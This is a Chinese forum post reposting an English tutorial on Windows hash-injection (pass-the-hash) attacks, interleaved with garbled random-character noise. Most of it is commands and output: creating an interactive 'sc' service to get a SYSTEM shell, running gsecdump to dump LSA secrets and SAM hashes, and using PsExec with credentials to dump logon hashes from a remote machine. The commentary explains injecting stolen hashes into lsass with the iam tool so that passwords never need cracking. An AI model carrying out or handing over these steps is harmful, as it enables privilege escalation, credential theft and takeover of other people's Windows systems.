HASH注入式攻击

admin

o get a DOS Prompt as NT system:
1 n' K- e: N! \; S+ g- _  e
( ?8 a  ?( x  I+ f7 mC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
  j4 v) d7 H2 e& Y, l[SC] CreateService SUCCESS
3 }7 `. H: l" l! \, t) U+ Y0 j
C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
  Z6 K- R' I: l) I5 m) s5 T
' Y. ?$ E- u0 [( \The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

: S2 ?% ~' j4 k2 e9 W0 h------------

Then in the new DOS window:
; c, m7 p; j5 W9 ], s0 a
Microsoft Windows XP [Version 5.1.2600]
6 X' W$ S0 e& ?$ |4 q0 D0 \% m. z(C) Copyright 1985-2001 Microsoft Corp.

: X6 _: t8 {4 X) N( Z. JC:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
  Z( J7 r4 D) z+ m# d2 W8 h
6 E2 Z5 X; B9 UC:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (链接标记[email protected])
! W7 o! b9 X  o+ busage: gsecdump [options]
# ^' z$ A/ s7 I) L+ @( d
) K. c  ~6 n, N6 U* U0 }options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
8 W; I: x! g4 }" Y* f4 [-l [ --dump_lsa ] dump lsa secrets
% |. w$ }; D4 u! ~% D. O1 Z+ ]-w [ --dump_wireless ] dump microsoft wireless connections
* ^7 |  V0 n7 i& c  @7 X1 N8 f-u [ --dump_usedhashes ] dump hashes from active logon sessions
' R* I. `$ e8 c8 D-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

# h2 k! j- e3 ]3 m! g6 A$ `4 TPsExec v1.83 - Execute processes remotely
) y" V  I% V+ |3 MCopyright (C) 2001-2007 Mark Russinovich
Sysinternals - 链接标记[url]www.sysinternals.com[/url]

. v$ G9 V/ t4 H( H/ xC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

2 x1 ^9 a( H- Q" C/ }- a% Bto get the hashes from active logon sessions of a remote system.
; C7 M  b) o5 h& E9 F" v
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
: f: T! T% I" [
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
9 U4 m' U- p0 y% i  |+ \$ L原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。